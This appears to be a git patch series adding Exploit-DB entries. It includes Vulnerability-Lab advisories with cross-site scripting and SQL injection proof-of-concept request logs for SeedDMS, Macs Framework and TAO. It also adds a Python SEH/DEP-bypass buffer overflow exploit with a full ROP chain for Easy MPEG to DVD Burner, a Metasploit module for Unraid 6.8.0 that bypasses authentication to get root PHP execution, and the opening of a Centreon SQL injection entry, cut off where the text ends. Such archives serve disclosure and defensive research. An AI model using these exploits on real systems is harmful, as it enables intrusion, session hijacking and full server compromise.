+ + +PoC: Payload +>" + + +--- PoC Session Logs (POST) --- +https://SeedDMS.localhost:8080/out/out.AddEvent.php +Host: SeedDMS.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Connection: keep-alive +Referer: https://SeedDMS.localhost:8080/out/out.Calendar.php?mode=y +Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312 +- +GET: HTTP/1.1 200 OK +Server: Apache/2.4.25 (Debian) +Vary: Accept-Encoding +Content-Encoding: gzip +Content-Length: 2973 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +- +https://SeedDMS.localhost:8080/op/op.AddEvent.php +Host: SeedDMS.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded +Content-Length: 356 +Origin: https://SeedDMS.localhost:8080 +Connection: keep-alive +Referer: https://SeedDMS.localhost:8080/out/out.AddEvent.php +Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312 +from=2020-04-13&to=2020-04-13 +&name=>"&comment=>" +- +POST: HTTP/1.1 302 Found +Server: Apache/2.4.25 (Debian) +Location: ../out/out.Calendar.php?mode=w&day=13&year=2020&month=04 +Content-Length: 0 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +Note: Injection Point via Calender op.AddEvent Name & Comment + + + +--- PoC Session Logs (GET) --- +https://SeedDMS.localhost:8080/out/out.LogManagement.php?logname=20200413.log +Host: SeedDMS.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: text/html, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +X-Requested-With: XMLHttpRequest +Connection: keep-alive +Referer: https://SeedDMS.localhost:8080/out/out.LogManagement.php +Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312 +- +GET: HTTP/1.1 200 OK +Server: Apache/2.4.25 (Debian) +Vary: Accept-Encoding +Content-Encoding: gzip +Content-Length: 273 +Keep-Alive: timeout=5, max=94 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 +- +https://SeedDMS.localhost:8080/out/evil.source +Host: SeedDMS.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Connection: keep-alive +Referer: https://SeedDMS.localhost:8080/out/out.LogManagement.php +Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312 +Upgrade-Insecure-Requests: 1 +- +GET: HTTP/1.1 302 Found +Server: Apache/2.4.25 (Debian) +Location: /out/out.ViewFolder.php +Content-Length: 0 +Keep-Alive: timeout=5, max=93 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +Note: Execution Point via Log Management (AP) on Webdav View or Web View + + + +Reference(s): +https://SeedDMS.localhost:8080/ +https://SeedDMS.localhost:8080/op/op.AddEvent.php +https://SeedDMS.localhost:8080/out/out.ViewFolder.php +https://SeedDMS.localhost:8080/out/out.AddEvent.php +https://SeedDMS.localhost:8080/out/out.LogManagement.php +https://SeedDMS.localhost:8080/out/out.Calendar.php?mode= +https://SeedDMS.localhost:8080/out/out.LogManagement.php?logname= + + +Solution - Fix & Patch: +======================= +1. Parse and escape the name and comment input field on transmit to sanitize +2. Filter and restrict the input field of the name and comments +parameter for special chars to prevent injects +3. Parse the output location of all web and webdav logfiles to prevent +the execution point + + +Security Risk: +============== +The security risk of the persistent cross site web vulnerabilities in +the seeddms web-application are estimated as medium. + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without +any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability +and capability for a particular purpose. Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, +indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been +advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or +incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. + +Domains: www.vulnerability-lab.com www.vuln-lab.com +www.vulnerability-db.com +Services: magazine.vulnerability-lab.com +paste.vulnerability-db.com infosec.vulnerability-db.com +Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab +youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php +vulnerability-lab.com/rss/rss_upcoming.php +vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php +vulnerability-lab.com/register.php +vulnerability-lab.com/list-of-bug-bounty-programs.php + +Any modified copy or reproduction, including partially usages, of this +file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified +form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. +All pictures, texts, advisories, source code, videos and other +information on this website is trademark of vulnerability-lab team & the +specific authors or managers. To record, list, modify, use or +edit our material contact (admin@ or research@) to get a ask permission. + + Copyright © 2020 | Vulnerability Laboratory - [Evolution +Security GmbH]™ + + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/php/webapps/48325.txt b/exploits/php/webapps/48325.txt new file mode 100644 index 000000000..0cb46c90a --- /dev/null +++ b/exploits/php/webapps/48325.txt @@ -0,0 +1,482 @@ +# Title: Macs Framework 1.14f CMS - Persistent Cross-Site Scripting +# Author: Vulnerability Laboratory +# Date: 2020-04-15 +# Software Link: https://sourceforge.net/projects/macs-framework/files/latest/download +# CVE: N/A + +Document Title: +=============== +Macs Framework v1.14f CMS - Multiple Web Vulnerabilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2206 + + +Release Date: +============= +2020-04-14 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2206 + + +Common Vulnerability Scoring System: +==================================== +7.4 + + +Vulnerability Class: +==================== +Multiple + + +Current Estimated Price: +======================== +1.000€ - 2.000€ + + +Product & Service Introduction: +=============================== +Macs CMS is a Flat File (XML and SQLite) based AJAX Content Management +System. It focuses mainly on the +Edit In Place editing concept. It comes with a built in blog with +moderation support, user manager section, +roles manager section, SEO / SEF URL. +https://sourceforge.net/projects/macs-framework/files/latest/download + +(Copy of the Homepage: https://sourceforge.net/projects/macs-framework/ ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered multiple web +vulnerabilities in the official Macs Framework v1.1.4f CMS. + + +Affected Product(s): +==================== +Macrob7 +Product: Macs Framework v1.14f - Content Management System + + +Vulnerability Disclosure Timeline: +================================== +2020-04-14: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Authentication Type: +==================== +Restricted authentication (user/moderator) - User privileges + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +1.1 & 1.2 +Multiple non-persistent cross site scripting web vulnerabilities has +been discovered in the official Mac Framework v1.1.4f Content Managament +System. +The vulnerability allows remote attackers to manipulate client-side +browser to web-applicatio requests to compromise user sesson credentials +or to +manipulate module content. + +The first vulnerability is located in the search input field of the +search module. Remote attackers are able to inject own malicious script +code as +search entry to execute the code within the results page that is loaded +shortly after the request is performed. The request method to inject is +POST +and the attack vector is located on the client-side with non-persistent +attack vector. + +The second vulnerability is located in the email input field of the +account reset function. Remote attackers are able to inject own +malicious script code as +email to reset the passwort to execute the code within performed +request. The request method to inject is POST and the attack vector is +located on the +client-side with non-persistent attack vector. + +Successful exploitation of the vulnerabilities results in session +hijacking, non-persistent phishing attacks, non-persistent external +redirects to +malicious source and non-persistent manipulation of affected or +connected application modules. + +Request Method(s): +[+] POST + +Vulnerable Parameter(s): +[+] searchString +[+] emailAdress + + +1.3 +Multiple remote sql-injection web vulnerabilities has been discovered in +the official Mac Framework v1.1.4f Content Managament System. +The vulnerability allows remote attackers to inject or execute own sql +commands to compromise the dbms or file system of the application. + +The sql injection vulnerabilities are located in the `roleId` and +`userId` of the `editRole` and `deletUser` module. The request method to +inject or execute commands is GET and the attack vector is located on +the application-side. Attackers with privileged accounts to edit are +able to inject own sql queries via roleid and userid on deleteUser or +editRole. Multiple unhandled and broken sql queries are visible as default +debug to output for users as well. + +Exploitation of the remote sql injection vulnerability requires no user +interaction and a privileged web-application user account. +Successful exploitation of the remote sql injection results in database +management system, web-server and web-application compromise. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] deleteUser +[+] editRole + +Vulnerable Parameter(s): +[+] userId +[+] roleId + + +Proof of Concept (PoC): +======================= +Google Dork(s): intitle, subtitle & co. +Site Powered by Mac's PHP MVC Framework Framework of the future +Design downloaded from Zeroweb.org: Free website templates, layouts, and +tools. + + +1.1 +The non-persistent cross site scripting web vulnerability can be +exploited by remote attackers without user account and with low user +interaction. +For security demonstration or to reproduce the cross site scripting web +vulnerability follow the provided information and steps below to continue. + + +PoC: Payload +>">" + + + + +--- PoC Session Logs [POST] --- +https://macs-cms.localhost:8080/index.php/main/cms/forgotPassword +Host: macs-cms.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded +X-Requested-With: XMLHttpRequest +Content-Length: 17 +Origin: https://macs-cms.localhost:8080 +Connection: keep-alive +Referer: https://macs-cms.localhost:8080/index.php/main/cms/login +Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652; +ajaxRequest=true +- +POST: HTTP/1.1 200 OK +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, +pre-check=0 +Pragma: no-cache +Content-Type: text/html; charset=ISO-8859-1 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Server: Microsoft-IIS/8.5 +X-Powered-By: ASP.NET +X-Powered-By-Plesk: PleskWin +Content-Length: 335 +- +https://macs-cms.localhost:8080/index.php/main/cms/forgotPasswordProcess +Host: macs-cms.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded +X-Requested-With: XMLHttpRequest +Content-Length: 123 +Origin: https://macs-cms.localhost:8080 +Connection: keep-alive +Referer: https://macs-cms.localhost:8080/index.php/main/cms/login +Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652; +ajaxRequest=true&=&emailAddress=test" + + + +PoC: Payload +" + + +--- PoC Session Logs [POST] --- +http://localhost:89/taoQtiTest/Creator/saveTest?uri=http%3A%2F%2Flocalhost%2Ftao.rdf%23i1586971961942612 +Host: localhost:89 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 9664 +Origin: http://localhost:89 +Connection: keep-alive +Referer: +http://localhost:89/tao/Main/index?structure=tests&ext=taoTests§ion=authoring +Cookie: tao_X3GLb7Ke=i89lfik72ts13i8soadgfb64hb; +tao_f46245c=9ebdee0d0f34b349a61ba23443ecc950c43a0042 +model={"qti-type":"assessmentTest","identifier":"Test-1","title":"QTI +Example Test","toolName":"tao","toolVersion":"2.7","outcomeDeclarations":[], +"timeLimits":{"qti-type":"timeLimits","maxTime":7810,"allowLateSubmission":false},"testParts":[{"qti-type":"testPart","identifier":"Introduction","navigationMode":1,"submissionMode":0,"preConditions":[],"branchRules":[], +"itemSessionControl":{"qti-type":"itemSessionControl","maxAttempts":0,"showFeedback":false,"allowReview":true,"showSolution":false,"allowComment":false, +"validateResponses":false,"allowSkipping":true},"assessmentSections":[{"qti-type":"assessmentSection","title":"Section +1","visible":true, +"keepTogether":true,"sectionParts":[{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971963337314","categories":[], +"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-1","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":0, +"itemSessionControl"{"qtitype":"itemSessionControl","maxAttempts":1,"showFeedback":false,"allowReview":true,"showSolution":false,"allowComment":true, +"validateResponses":false,"allowSkipping":true},"isLinear":false}],"identifier":"assessmentSection-1","required":true,"fixed":false,"preConditions":[],"branchRules":[], +"itemSessionControl":{"qti-type":"itemSessionControl","maxAttempts":1,"showFeedback":false,"allowReview":true,"showSolution":false,"allowComment":true,"validateResponses": +false,"allowSkipping":true},"index":0}],"testFeedbacks":[],"index":0},{"qti-type":"testPart","identifier":"QTIExamples","navigationMode":0,"submissionMode":0,"preConditions":[],"branchRules":[],"assessmentSections":[{"qti-type":"assessmentSection","title":"Section +1","visible":false,"keepTogether":true,"sectionParts":[{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971964187315","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-2","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":0,"itemSessionControl":{"qti-type":"itemSessionControl","maxAttempts":1,"showFeedback":false,"allowComment":false,"allowSkipping":true,"validateResponses":false},"isLinear":true, +"timeLimits":{"maxTime":0,"minTime":0,"allowLateSubmission":false,"qti-type":"timeLimits"}},{"qti-type":"assessmentItemRef", +"href":"http://localhost/tao.rdf#i1586971965925016","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-3","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":1,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true}, +{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i158697196662817","categories":[],"variableMappings":[],"weights":[], +"templateDefaults":[],"identifier":"item-4","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":2,"itemSessionControl +":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971967539318","categories" +:[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-5","required":false,"fixed":false,"preConditions":[],"branchRules":[], +"index":3,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href": +"http://localhost/tao.rdf#i1586971968508019","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-6", +"required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":4,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971969922220","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier": +"item-7","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":5,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i158697197087021","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-8","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":6,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971970668622","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier": +"item-9","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":7,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true}],"identifier":"assessmentSection-2","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":0, +"itemSessionControl":{"qti-type":"itemSessionControl"},"rubricBlocks":[{"qti-type":"rubricBlock","index":0,"content":[{"qti-type":"div","id":"","class":"","xmlBase":"","lang":"","label":"","content":[{"qti-type":"textRun","content":"asd>"", +"xmlBase":""}]}],"views":["candidate"],"orderIndex":1,"uid":"rb1","feedback":{"activated":false,"outcome":null,"matchValue":null,"qti-type":"feedback"}, +"class":""}]}],"testFeedbacks":[],"index":1}],"testFeedbacks":[],"scoring":{"modes":{"none":{"key":"none","label":"None","description":"No +outcome processing. +Erase the existing rules, if +any.","qti-type":"none"},"custom":{"key":"custom","label":"Custom","description":"bufu","qti-type":"cut"},"qti-type":"modes"},"scoreIdentifier":"SCORE","weightIdentifier":"","cutScore":0.5,"categoryScore":false,"outcomeProcessing":"none","qti-type":"scoring"}} +- +POST: HTTP/1.1 200 OK +Server: Apache/2.4.38 (Win32) PHP/7.2.15 +X-Powered-By: PHP/7.2.15 +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Content-Security-Policy: frame-ancestors 'self' +Content-Length: 14 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: application/json; charset=UTF-8 +- +http://localhost:89/tao/Main/evil.source +Host: localhost:89 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: image/webp,*/* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Referer: +http://localhost:89/tao/Main/index?structure=tests&ext=taoTests§ion=authoring +Cookie: tao_X3GLb7Ke=i89lfik72ts13i8soadgfb64hb; +tao_f46245c=9ebdee0d0f34b349a61ba23443ecc950c43a0042 +- +GET: HTTP/1.1 200 OK +Server: Apache/2.4.38 (Win32) PHP/7.2.15 +X-Powered-By: PHP/7.2.15 +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Content-Length: 169 +Keep-Alive: timeout=5, max=99 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + + +Security Risk: +============== +1.1 +The security risk of the html inject web vulnerability in the +web-application is estimated as medium. + +1.2 +The security risk of the persistent cross site scripting web +vulnerability in the web-application is estimated as medium. + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without +any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability +and capability for a particular purpose. Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, +indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been +advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or +incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. + +Domains: www.vulnerability-lab.com www.vuln-lab.com +www.vulnerability-db.com +Services: magazine.vulnerability-lab.com +paste.vulnerability-db.com infosec.vulnerability-db.com +Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab +youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php +vulnerability-lab.com/rss/rss_upcoming.php +vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php +vulnerability-lab.com/register.php +vulnerability-lab.com/list-of-bug-bounty-programs.php + +Any modified copy or reproduction, including partially usages, of this +file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified +form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. +All pictures, texts, advisories, source code, videos and other +information on this website is trademark of vulnerability-lab team & the +specific authors or managers. To record, list, modify, use or +edit our material contact (admin@ or research@) to get a ask permission. + + Copyright © 2020 | Vulnerability Laboratory - [Evolution +Security GmbH]™ + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/windows/local/48339.py b/exploits/windows/local/48339.py new file mode 100755 index 000000000..355fbea67 --- /dev/null +++ b/exploits/windows/local/48339.py @@ -0,0 +1,150 @@ +# Exploit Title: Easy MPEG to DVD Burner 1.7.11 - Buffer Overflow (SEH + DEP) +# Date: 2020-04-15 +# Exploit Author: Bailey Belisario +# Tested On: Windows 7 Ultimate x64 +# Software Link: https://www.exploit-db.com/apps/32dc10d6e60ceb4d6e57052b6de3a0ba-easy_mpeg_to_dvd.exe +# Version: 1.7.11 +# Exploit Length: 1015 Bytes +# Steps : Open application > Register > In Username field paste content of pwn.txt file (Note open this in sublime or vscode) + +# Easy MPEG to DVD Burner 1.7.11 SEH + DEP Bypass using VirtualProtect() on Local Buffer Overflow +# Exploit used with Python2.7 +#------------------------------------------------------------------------------------------------------------------------------------# +# Bad Characters: \x00\x0a\x0d # +# SEH Offset: 1012 # +# Modules Used: SkinMagic.dll & Easy MPEG to DVD Burner.exe # +#------------------------------------------------------------------------------------------------------------------------------------# + +# Register setup for VirtualProtect() (Bypass DEP) : +#--------------------------------------------------- +# EAX = Points to PUSHAD at time VirtualProtect() is called +# ECX = lpflOldProtect (0x10047d30 as writable location) +# EDX = flNewProtect(0x40) +# EBX = dwSize (0x92) +# ESP = lpAddress (automatic) +# EBP = ReturnTo (ptr to jmp esp) +# ESI = ptr to VirtualProtect() +# EDI = ROP NOP (RETN) + +import struct + +def create_rop_chain(): + + rop_gadgets = [ + + # Put 1 in EDX and decrement to 0 + 0x10031752, # XOR EDX,EDX # CMP EAX,DWORD PTR [ECX+8] # SETGE DL # MOV AL,DL # RETN + 0x1003629a, # ADD EAX,4 # DEC EDX # JNE SKINMAGIC!SETSKINMENU+0X2F505 (10036295) # POP ESI # RETN + 0x11111111, # Filler + + # Pop the pointer of VirtualProtect into EAX + 0x10037b12, # POP EAX # RETN + 0x1003b268, # ptr to &VirtualProtect() [IAT SkinMagic.dll] + + # Dereference Pointer into EDX then move back to EAX + 0x1001c011, # ADD EDX,DWORD PTR [EAX] # RETN 0x0C + 0x10031772, # MOV EAX,EDX # RETN + 0x11111111, # Filler + 0x11111111, # Filler + 0x11111111, # Filler + + # Push VP and pop into EBP + 0x1002e17b, # PUSH EAX # PUSH ESP # XOR EAX,EAX # POP ESI # POP EBP # RETN 0x0C + 0x10037b12, # POP EAX # RETN + 0x11111111, # Filler + 0x11111111, # Filler + 0x11111111, # Filler + + # Use this to get to address needed to Pop VP into ESI + 0x1003619e, # POP EAX # POP ESI # RETN + + # Move VP to +12 on stack then push the POP POP RETN + 0x10032485, # MOV DWORD PTR [ESP+0CH],EBP # LEA EBP,DWORD PTR DS:[ESP+0CH] # PUSH EAX # RETN + 0x11111111, # Filler popped + 0x11111111, # Filler popped + + # Set ESI to VP + 0x1002e1ce, # POP ESI # RETN [SkinMagic.dll] + 0x11111111, # Where VP is MOV into + + # Set EBP with POP EBP RETN + 0x1002894f, # POP EBP # RETN [SkinMagic.dll] + 0x1002894f, # skip 4 bytes [SkinMagic.dll] + + # Set EDX (# s -d 0x10000000 L?0x10050000 0000003f <- used to find 3F) + # Clear out EDX, set it to 0x01, find address where DWORD of EAX will be 0x3F, then add to EDX to be 0x40 + 0x10031752, # XOR EDX,EDX # CMP EAX,DWORD PTR [ECX+8] # SETGE DL # MOV AL,DL # RETN + 0x10037b12, # POP EAX # RETN + 0x1005a0a0, # Address of 3F + 0x10026173, # ADD EDX,DWORD PTR [EAX] # RETN + + # Set EBX to 0x92 assuming EBX is 0, but could work with a decent range of numbers + # Note: This should be at least length of shellcode + 0x100362c6, # XOR EAX,EAX # RETN + 0x10033fb2, # ADD AL,0C9 # RETN + 0x10033fb2, # ADD AL,0C9 # RETN + 0x10035c12, # ADC BL,AL # OR CL,CL # JNE SKINMAGIC!SETSKINMENU+0X2EEDB (10035C6B) # RETN + + # Set ECX to writable location + 0x1003603f, # POP ECX # RETN [SkinMagic.dll] + 0x10047d30, # &Writable location [SkinMagic.dll] + + # Set EDI to ROP NOP + 0x100395c2, # POP EDI # RETN [SkinMagic.dll] + 0x10032982, # RETN (ROP NOP) [SkinMagic.dll] + + # Do PUSHAD and be 1337 + 0x10037654, # POP EAX # RETN + 0xa140acd2, # CONSTANT + 0x100317c8, # ADD EAX,5EFFC883 # RETN + 0x1003248d, # PUSH EAX # RETN + + # Used to jump to ESP + 0x1001cc57, # ptr to 'push esp # ret ' [SkinMagic.dll] + ] + return ''.join(struct.pack(' Date: Tue, 21 Apr 2020 05:01:47 +0000 Subject: [PATCH 14/18] DB: 2020-04-21 7 changes to exploits/shellcodes Atomic Alarm Clock 6.3 - Stack Overflow (Unicode+SEH) Nsauditor 3.2.1.0 - Buffer Overflow (SEH+ASLR bypass (3 bytes overwrite)) Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH) Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit) Centreon 19.10.5 - 'id' SQL Injection Fork CMS 5.8.0 - Persistent Cross-Site Scripting --- exploits/linux/remote/48353.rb | 101 +++++++ exploits/php/webapps/48345.txt | 69 +++++ exploits/php/webapps/48348.txt | 491 +++++++++++++++++++++++++++++++ exploits/windows/local/48346.py | 97 ++++++ exploits/windows/local/48350.py | 108 +++++++ exploits/windows/local/48351.py | 54 ++++ exploits/windows/local/48352.txt | 28 ++ files_exploits.csv | 7 + 8 files changed, 955 insertions(+) create mode 100755 exploits/linux/remote/48353.rb create mode 100644 exploits/php/webapps/48345.txt create mode 100644 exploits/php/webapps/48348.txt create mode 100755 exploits/windows/local/48346.py create mode 100755 exploits/windows/local/48350.py create mode 100755 exploits/windows/local/48351.py create mode 100644 exploits/windows/local/48352.txt diff --git a/exploits/linux/remote/48353.rb b/exploits/linux/remote/48353.rb new file mode 100755 index 000000000..55f048b35 --- /dev/null +++ b/exploits/linux/remote/48353.rb @@ -0,0 +1,101 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::PhpEXE + + Rank = ExcellentRanking + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Unraid 6.8.0 Auth Bypass PHP Code Execution', + 'Description' => %q{ + This module exploits two vulnerabilities affecting Unraid 6.8.0. + An authentication bypass is used to gain access to the administrative + interface, and an insecure use of the extract PHP function can be abused + for arbitrary code execution as root. + }, + 'Author' => + [ + 'Nicolas CHATELAIN ' + ], + 'References' => + [ + [ 'CVE', '2020-5847' ], + [ 'CVE', '2020-5849' ], + [ 'URL', 'https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/' ], + [ 'URL', 'https://forums.unraid.net/topic/88253-critical-security-vulnerabilies-discovered/' ] + ], + 'License' => MSF_LICENSE, + 'Platform' => ['php'], + 'Privileged' => true, + 'Arch' => ARCH_PHP, + 'Targets' => + [ + [ 'Automatic', {}] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Feb 10 2020' + ) + ) + + register_options( + [ + OptString.new('TARGETURI', [ true, 'The URI of the Unraid application', '/']) + ] + ) + end + + def check + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'), + 'method' => 'GET' + ) + + unless res + return CheckCode::Unknown('Connection failed') + end + + unless res.code == 200 + return CheckCode::Safe('Unexpected reply') + end + + /\sVersion:\s(?[\d]{1,2}\.[\d]{1,2}\.[\d]{1,2}) / =~ res.body + + if version && Gem::Version.new(version) == Gem::Version.new('6.8.0') + return CheckCode::Appears("Unraid version #{version} appears to be vulnerable") + end + + CheckCode::Safe + end + + def exploit + begin + vprint_status('Sending exploit code') + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'), + 'method' => 'GET', + 'encode_params' => false, + 'vars_get' => + { + 'path' => 'x', + 'site[x][text]' => Rex::Text.uri_encode("", 'hex-normal') + } + ) + + if res.nil? + print_good('Request timed out, OK if running a non-forking/blocking payload...') + elsif res.code == 302 + fail_with(Failure::NotVulnerable, 'Redirected, target is not vulnerable.') + else + print_warning("Unexpected response code #{res.code}, please check your payload.") + end + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") + end + end +end \ No newline at end of file diff --git a/exploits/php/webapps/48345.txt b/exploits/php/webapps/48345.txt new file mode 100644 index 000000000..6a9c7ba07 --- /dev/null +++ b/exploits/php/webapps/48345.txt @@ -0,0 +1,69 @@ +# Exploit Title: Centreon 19.10.5 - 'id' SQL Injection +# Date: 2020-04-19 +# Exploit Author: Basim alabdullah +# Vendor Homepage: https://www.centreon.com +# Software Link: https://download.centreon.com/ +# Version: v.19.10.5 +# Tested on: Centos 5 + + +[EXECUTIVE SUMMARY] + + Centreon has come a long way from its early roots. A user-friendly monitoring console on Nagios before, Centreon is today, a rich monitoring platform powered by Centreon Engine, Centreon Broker and Centreon Web. + + Monitoring-savvy IT practitioners who want Nagios-inspired flexibility without its complexity, easily embrace Centreon for robust 